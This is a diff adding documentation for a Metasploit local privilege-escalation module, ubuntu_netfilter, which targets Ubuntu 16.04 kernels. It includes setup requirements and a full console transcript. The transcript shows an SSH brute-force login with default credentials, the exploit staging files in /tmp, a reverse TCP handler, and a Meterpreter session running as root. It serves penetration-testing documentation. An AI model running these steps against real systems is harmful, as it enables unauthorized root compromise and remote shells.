sempervictus
diff --git a/‎documentation/modules/exploit/linux/local/ubuntu_netfilter.md
Lines changed: 94 additions & 0 deletions b/‎documentation/modules/exploit/linux/local/ubuntu_netfilter.md
Lines changed: 94 additions & 0 deletions
@@ -0,0 +1,94 @@
+## Creating A Testing Environment
+
+There are a few requirements for this module to work:
+
+  1. ip_tables.ko has to be loaded (root running iptables -L will do such)
+  2. libc6-dev-i386 needs to be installed to compile
+  3. shem and sham can not be installed/running
+
+This module has been tested against:
+
+  1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
+
+This module *should* work against
+
+  1. Ubuntu 16.04
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/ubuntu_netfilter`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **MAXWAIT**
+
+  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+## Scenarios
+
+### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
+
+Initial Access
+
+    msf > use auxiliary/scanner/ssh/ssh_login
+    msf auxiliary(ssh_login) > set rhosts 127.0.0.1
+    rhosts => 127.0.0.1
+    msf auxiliary(ssh_login) > set username nagios
+    username => nagios
+    msf auxiliary(ssh_login) > set password nagios
+    password => nagios
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'nagios:nagios' 'uid=1000(nagios) gid=1000(nagios) groups=1000(nagios),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1001(nagcmd) Linux nagios 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (127.0.0.1:36085 -> 127.0.0.1:22) at 2016-09-16 01:15:34 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Escalate
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter
+    msf exploit(ubuntu_netfilter) > set session 1
+    session => 1
+    msf exploit(ubuntu_netfilter) > set verbose true
+    verbose => true
+    msf exploit(ubuntu_netfilter) > exploit
+    
+    [*] Started reverse TCP handler on 172.20.14.188:4444 
+    [*] Checking if libc6-dev-i386 is installed
+    [+] libc6-dev-i386 is installed
+    [*] Checking if ip_tables.ko is loaded
+    [+] ip_tables.ko is loaded
+    [*] Checking if shem or sham are installed
+    [+] shem and sham not present.
+    [*] Writing desc executable to /tmp/452xNomE.c
+    [*] Max line length is 65537
+    [*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf
+    [*] Executing /tmp/452xNomE, may take around 35s to finish.  Watching for /tmp/rrOA1xsB to be created.
+    [*] Waited 0s so far
+    [*] Waited 10s so far
+    [*] Waited 20s so far
+    [*] Waited 30s so far
+    [+] desc finished, env ready.
+    [*] Writing payload to /tmp/HbFVMTZM
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Writing pwn executable to /tmp/eRFqvuyG.c
+    [*] Max line length is 65537
+    [*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf
+    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+    [*] Sending stage (1495599 bytes) to 172.20.14.188
+    [*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400
+    
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0